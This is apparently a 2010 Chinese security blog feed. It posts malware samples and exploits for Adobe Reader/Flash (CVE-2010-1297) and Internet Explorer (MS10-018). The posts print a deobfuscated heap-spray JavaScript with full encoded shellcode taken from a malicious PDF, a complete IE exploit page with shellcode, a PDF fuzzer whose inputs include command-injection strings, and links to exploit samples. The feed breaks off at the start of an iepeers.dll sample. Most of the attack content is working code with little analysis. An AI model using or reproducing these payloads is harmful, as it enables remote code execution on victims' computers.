<![CDATA[Friddy's罐子]]> http://www.friddy.cn/ zh-cn PBlog2 v2.4 Friddy's罐子 http://www.friddy.cn/images/logos.gif http://www.friddy.cn/ Friddy's罐子 http://www.friddy.cn/article.asp?id=124 <![CDATA[CVE-2010-1297那个Adobe洞的内幕]]> root@friddy.cn(friddy) Wed,09 Jun 2010 08:31:21 +0800 http://www.friddy.cn/default.asp?id=124 Adobe近日发布了一个安全公告,称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞,该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统,Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案,但Flash Player 10.1 Release Candidate不受此漏洞影响,用户可下载使用或采取以下临时解决方案,以避免受到漏洞威胁。


================================================================

pdf样本(解压密码friddy):

点击下载此文件

=======================================================================

解出里面的javascript,看起来此次“并非国人所为”:

各位看客请仔细看!~~!特别注意“第四行”

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();

扩展阅读:

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html

]]> http://www.friddy.cn/article.asp?id=123 <![CDATA[恩]]> root@friddy.cn(friddy) Mon,19 Apr 2010 17:59:48 +0800 http://www.friddy.cn/default.asp?id=123
]]> http://www.friddy.cn/article.asp?id=122 <![CDATA[ MS IE MS10018 Exploit Published]]> root@friddy.cn(friddy) Mon,12 Apr 2010 12:49:53 +0800 http://www.friddy.cn/default.asp?id=122 Title : Microsoft Internet Explorer Code Execution Vulnerabilities (MS10-018)
VUPEN ID : VUPEN/ADV-2010-0744
CVE ID : CVE-2010-0267 - CVE-2010-0488 - CVE-2010-0489 - CVE-2010-0490 - CVE-2010-0491 - CVE-2010-0492 - CVE-2010-0494 - CVE-2010-0805 - CVE-2010-0806 - CVE-2010-0807
 

/*ms10018 Exploit*/

<html><body>
<script>
var cn = new Array();
var shellcode = unescape( '%uf946%u41fd%u9f4f%uf83f%u4a4e%ufc9b%u9b27%u9f42%u48f5%u4e9b%u46fc%u994f%u4f9f%ufc4f%u9892%u46fc%u99f5%u463f%u9293%u4afc%u4043%ud693%u9242%ud64f%u9643%u484f%u9743%u27f8%u27d6%u4347%u2791%uf948%u4a91%u9b9f%u37fc%u9292%u9648%u374b%u3f2f%u99fd%u9f4a%uf591%u2fd6%u379f%u37d6%u9097%ufc49%ufc46%u923f%u4640%u9ff5%u929b%u4827%u9043%u37f8%uf93f%u9992%u9899%u964a%u9948%u9f98%u9646%u4190%u4797%u4841%u2f9b%u4796%u4742%u2ff5%ufc46%u9b3f%u27f9%uf937%u9348%u414b%ud642%u9827%ufc4b%u9848%u963f%u9349%u2f4f%u4a48%ud693%u49fd%u9191%ud641%u9640%u3f4a%u4137%u474a%u4899%u4f3f%u939b%uf941%u9041%ufc9f%u9693%u4f47%u9392%u274e%uf990%u4af9%u9748%uf547%u4f4f%u489b%u27fc%u9048%ufd3f%u9b97%u49d6%uf99f%u4092%u424f%u4327%u9196%uf52f%u9b41%u4b41%u93f5%uf54a%u2f48%u9048%u9ff9%u9842%u4e41%u90f8%u3f9f%ud64f%ufc3f%u9b27%uf5f5%u4e96%u4049%ud69b%u43f8%u273f%u4f96%ud691%u964b%ufcf9%u4140%u4efc%u2797%uf999%u4743%u3f37%u974a%uf83f%ufc9b%ufc4f%u4a4b%u43d6%u464e%u27d6%ufc98%u93fc%u4696%u9297%u963f%u9299%u4096%u9697%u4227%u9891%uf940%u47f9%u9742%u4b9b%u4247%u484f%u2743%u9b3f%ufd2f%u41f8%uf99b%ud646%u93f8%u9940%ud648%u9290%u4f49%ufc4f%u48f8%u3f98%u9b91%u9f98%u4640%u4348%u462f%ud647%u964e%u9f49%ud69b%u41f9%u4841%u92fc%u4f93%u9b98%u492f%u4093%ufdd6%u9792%u4698%u4347%u9197%u2746%u274b%u4640%u4890%u4b92%u4141%u4e96%u9640%u9646%u4f3f%u41fc%u9892%u3f2f%u9046%u9396%ufc4e%u404a%u9646%u4197%u9091%u93d6%u9796%u4f49%u90f9%u9f48%ufd92%u4e4a%u4697%ufdfd%u4a98%u97f9%u404f%u46fd%u42f5%u4137%u9247%uf941%u4bfd%u9692%u47f5%u9890%u9093%u404f%u9897%u419b%u474f%u4796%u4193%u90fd%u373f%u424e%u4793%u4641%u2796%u4f4b%uf992%u3747%u4a2f%u4b9f%u41fd%u9327%u424f%ufd99%u4b9b%ufc9b%u274a%u3749%u9127%u4e49%uf5fc%u4a27%u3f4b%u272f%u403f%u4198%u4a93%u93fd%u4a4b%u434a%u414e%u3792%ud627%u2797%uf99b%u4141%ufd46%u4f93%u9947%u9397%uf84b%u48f8%u2740%u414b%u989f%u4098%u3748%u4037%uf546%u49fc%u9f4e%u4841%u2792%u9f97%u43fc%u99d6%u9399%u4640%u92f8%u4391%u9f91%u4737%ufd2f%u4690%u274a%u4398%u934a%u9137%u984f%u92fd%u99fd%u402f%uf9f8%u4091%u93f5%u374b%ufd4a%u4047%u924a%u4841%u929f%u4e9b%u9042%u4298%ufc40%uf991%uf898%u9892%u9891%ufcfc%u4237%u4741%u4f90%u939f%u3f98%uf998%u4092%u4092%u4a99%u484f%u993f%u9ffc%u42f8%u2f98%uf59f%u98f5%u9bf9%u922f%u973f%u9241%u964f%u2f37%u982f%u9342%u4e37%u9249%u9b37%u403f%u9146%u482f%u9143%uf947%uf5f8%u9648%u422f%u4749%ud691%ufcd6%u9b4a%u2743%ud69f%u43f5%u4199%u9bf5%u4f4b%u2747%u9341%u4a3f%u9390%u4097%u9249%ud94e%ubac2%u01cf%uba17%u74d9%uf424%uc931%u33b1%u835b%ufceb%u5331%u0315%u1553%uf42d%u7e96%u05e5%u8167%u02f9%u7e11%ud301%uf642%ue2e4%u6c50%u566d%ue665%u5b23%uaa0e%ue8d7%u6362%u59d8%u55c8%u5ad7%u59fc%u99bb%u259e%ucdc1%u1740%u000a%u5080%ueb76%u09d0%u5efd%u3ec5%u6343%u90e4%udbc8%u959e%uaf0e%u9714%u005e%udf22%u2a46%uc06c%uff77%u3c6e%u743e%ub644%u5cc1%u3794%ua0f0%u067b%u2d3d%u4e85%ucef9%ua4f0%u73fa%u7f03%uaf81%u6286%u3b21%u4730%ue8d0%u0ca7%u45de%u4ba3%u58c2%ue060%ud1fe%u2787%ua177%ue3a3%u71dc%ub2cd%ud4b8%ua5f2%u8864%uad56%udd86%uece1%u20cc%u8b63%u23a9%u947b%u4b99%u1f4a%u0b76%uca53%ue333%u5719%u6c15%u0dc4%uf124%ufbf7%u0c6a%u0e74%ueb12%u7b64%ub717%u9722%ua865%u97c6%uc9da%ufbc2%u59bd%ufb8e');
var big = unescape("%u0c0c%u0c0c%u0c0c%u0c0c");
do { big += big } while( big.length < 0x4000 );
for (i = 0; i < 150; i++) cn[i] = big + shellcode;
</script>
<object classid='clsid:333C7BC4-460F-11D0-BC04-0080C7055A83'>
<param name='DataURL' value='http://FIZhqYTkyJeNotW7jWmki7qTSbfsSRFkvvgaaPqnDf4T0e2KPcuqJ5nKeblbmg6qfuQbottEU80XcpiT0Hasu8PzTys7WFPoZLt4u3f0E4RuokYXpgJkJIWmis1RE147NqxinQ6EuTbEfXiyNoA7hYNO5lD3Valc0ICSWz07WMJBjbwxfi12NCAGiIv2j0bCXjit4ob9ZVxuqLoS2EPnwUdIfKDAK5BedMI5rYMtKJENCgBX85fSq8I1LnPdnYrGhFN7y9zqpKvWxmUKfNtNyuFIjs2vUG1e0ROpaWgAghflnK0Yllvl7KWaNVh4M6HCjDNEVJB4oipUTTiIFTxb4KIcle9Q3VOzNiyfZRnvac9VILWaxOcJstGWM5PSwTtIOCilT538prYGEFeQHCNPLDMiNY04NvLrh2XVjT9iOB8Hgf2iPy6I7bEMOFoc2CLC1MbmJwe1YRK06jdCENOiArc9PZ9SzmIhHiwQmNu0IbEaLE3uOQZO0e9c8jCzCSHQ46Aj3NpjMaUJ5uXndoQs29acnR'/>
</object>
</body></html>
 

]]> http://www.friddy.cn/article.asp?id=121 <![CDATA[PDF File Standard Fuzzer]]> root@friddy.cn(friddy) Tue,23 Mar 2010 16:03:59 +0800 http://www.friddy.cn/default.asp?id=121 #!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# PDF FUZZER -- TAKE IT TO THE HEAD
# :) HAVE FUN :)

use PDF::Create;
use Getopt::Std;

@overflow = ('A' x 8200, 'A' x 11000, 'A' x 110000, 'A' x 550000, 'A' x 1100000, 'A' x 2200000, 'A' x 12000000, "\0x99" x 1200, "//AAAA" x 250, "\\AAAA" x 250);

@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",
              "%s%p%x%d", "%.1024d", "%.1025d", "%.2048d", "%.2049d", "%.4096d", "%.4097d",
              "%99999999999s", "%08x", "%%20n", "%%20p", "%%20s", "%%20d", "%%20x",
              "%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%", "\0xCD" x 50, "\0xCB" x 50);

@numbers = ("0", "-0", "1", "-1", "32767", "-32768", "2147483647", "-2147483647", "2147483648", "-2147483648",
            "4294967294", "4294967295", "4294967296", "357913942", "-357913942", "536870912", "-536870912",
            "1.79769313486231E+308", "3.39519326559384E-313", "99999999999", "-99999999999", "0x100", "0x1000",
            "0x3fffffff", "0x7ffffffe", "0x7fffffff", "0x80000000", "0xffff", "0xfffffffe", "0xfffffff", "0xffffffff",
            "0x10000", "0x100000", "0x99999999", "65535", "65536", "65537", "16777215", "16777216", "16777217", "-268435455");

@miscbugs = ("test|touch /tmp/ZfZ-PWNED|test", "test`touch /tmp/ZfZ-PWNED`test", "test'touch /tmp/ZfZ-PWNED'test", "test;touch /tmp/ZfZ-PWNED;test",
             "test&&touch /tmp/ZfZ-PWNED&&test", "test|C:/WINDOWS/system32/calc.exe|test", "test`C:/WINDOWS/system32/calc.exe`test",
             "test'C:/WINDOWS/system32/calc.exe'test", "test;C:/WINDOWS/system32/calc.exe;test", "/bin/sh", "C:/WINDOWS/system32/calc.exe", "%0xa", "%u000");

getopts('t:o:', \%opts);
$target = $opts{'t'};
$pdfdoc = $opts{'o'};

if(!defined($target) || !defined($pdfdoc))
{
     print "\n pdfUZZ - PDF Fuzzer";
     print "\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]";
     print "\n Usage: $0 -t <targetapp> -o <output.pdf>\n\n";
     exit(0);

}

     print "\n pdfUZZ - PDF Fuzzer";
     print "\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n";

print "\nFUZZING '$target' with '$pdfdoc' [STAGE->1(Version)]";

print "\n";
foreach(@numbers) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => $fuzz,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->2(Author)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->3(Title)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => $fuzz,
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => $fuzz,
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => $fuzz,
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->4(page_size)]";

print "\n";
foreach(@numbers) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => [$fuzz, $fuzz, $fuzz, $fuzz]);
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->5(Subject)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => $fuzz,
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => $fuzz,
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => $fuzz,
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->6(Keywords)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => $fuzz);
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => $fuzz);
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => $fuzz,
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => $fuzz);
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$pdf->close;
system $target $pdfdoc; }

print "\nFUZZING '$target' with '$pdfdoc' [STAGE->7(font/Subtype)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => $fuzz,
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => $fuzz,
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => $fuzz,
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->8(font/Encoding)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => $fuzz,
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => $fuzz,
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => $fuzz,
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->9(font/BaseFont)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => $fuzz);
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => $fuzz);
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => $fuzz);
$page->string($ffont, 20, 300, 300, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }

print "\nFUZZING '$target' with '$pdfdoc' [STAGE->10(string/z+x+y)]";

print "\n";
foreach(@numbers) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, $fuzz, $fuzz, $fuzz, "pdfUZZ");
$pdf->close;
system $target $pdfdoc; }

print "FUZZING '$target' with '$pdfdoc' [STAGE->11(string/text)]";

print "\n";
foreach(@overflow) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, $fuzz);
$pdf->close;
system $target $pdfdoc; }
foreach(@fmtstring) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, $fuzz);
$pdf->close;
system $target $pdfdoc; }
foreach(@miscbugs) { $fuzz = $_;
$pdf = new PDF::Create('filename' => $pdfdoc,
                       'Version' => 1.2,
                       'Author' => 'pdfUZZ',
                       'Title' => 'pdfUZZ',
                       'CreationDate' => [localtime],
                       'Subject' => 'pdfUZZ',
                       'Keywords' => 'pdfUZZ');
$main = $pdf->new_page('MediaBox' => $pdf->get_page_size('A4'));
$page = $main->new_page;
$ffont = $pdf->font('Subtype' => 'Type1',
                    'Encoding' => 'WinAnsiEncoding',
                    'BaseFont' => 'Times-Roman');
$page->string($ffont, 20, 300, 300, $fuzz);
$pdf->close;
system $target $pdfdoc; }

exit;

]]> http://www.friddy.cn/article.asp?id=120 <![CDATA[Adobe Reader 《=9.3.0 TIFF 漏洞]]> root@friddy.cn(friddy) Tue,16 Mar 2010 20:52:31 +0800 http://www.friddy.cn/default.asp?id=120
下载文件 点击下载此文件

打开后pop up MessageBox
<=9.3.0
]]> http://www.friddy.cn/article.asp?id=119 <![CDATA[Microsoft Internet Explorer iepeers.dll 样本]]> root@friddy.cn(friddy) Thu,11 Mar 2010 18:13:57 +0800 http://www.friddy.cn/default.asp?id=119 <button id='mybtn' onclick='crash();' style='display:none'></button>
<script language='javascript'>
function myfun1(){
